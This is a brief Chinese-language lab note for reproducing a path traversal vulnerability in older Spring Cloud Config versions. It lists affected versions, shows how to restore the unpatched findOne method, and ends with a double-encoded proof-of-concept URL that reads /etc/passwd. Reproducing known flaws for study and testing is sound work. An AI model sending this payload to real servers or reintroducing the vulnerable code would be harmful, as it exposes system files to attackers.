关于这个漏洞
影响范围:
Spring Cloud Config 2.1.0 to 2.1.1
Spring Cloud Config 2.0.0 to 2.0.3
Spring Cloud Config 1.4.0 to 1.4.5
其他不受支持的老版本 (如Spring Cloud Config1.3及其以下版本)
具体更新细节见:https://github.com/spring-cloud/spring-cloud-config/commit/9617f2922ee2ae27f08676716224933f0d869719
下载 git 项目 :https://github.com/spring-cloud/spring-cloud-config
修改 GenericResourceRepository.java
替换 findOne
方法为未修补前的代码
@Override
public synchronized Resource findOne(String application, String profile, String label,
String path) {
if (StringUtils.hasText(path)) {
String[] locations = this.service.getLocations(application, profile, label)
.getLocations();
try {
for (int i = locations.length; i-- > 0;) {
String location = locations[i];
for (String local : getProfilePaths(profile, path)) {
Resource file = this.resourceLoader.getResource(location)
.createRelative(local);
if (file.exists() && file.isReadable()) {
return file;
}
}
}
}
catch (IOException e) {
throw new NoSuchResourceException(
"Error : " + path + ". (" + e.getMessage() + ")");
}
}
throw new NoSuchResourceException("Not found: " + path);
}
在项目根目录运行 mvn spring-boot:run
分析
https://mp.weixin.qq.com/s/yj0cWEsyiPJr4A7YXpmLJw
复现
poc:
/test/pathtraversal/master/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f../etc/passwd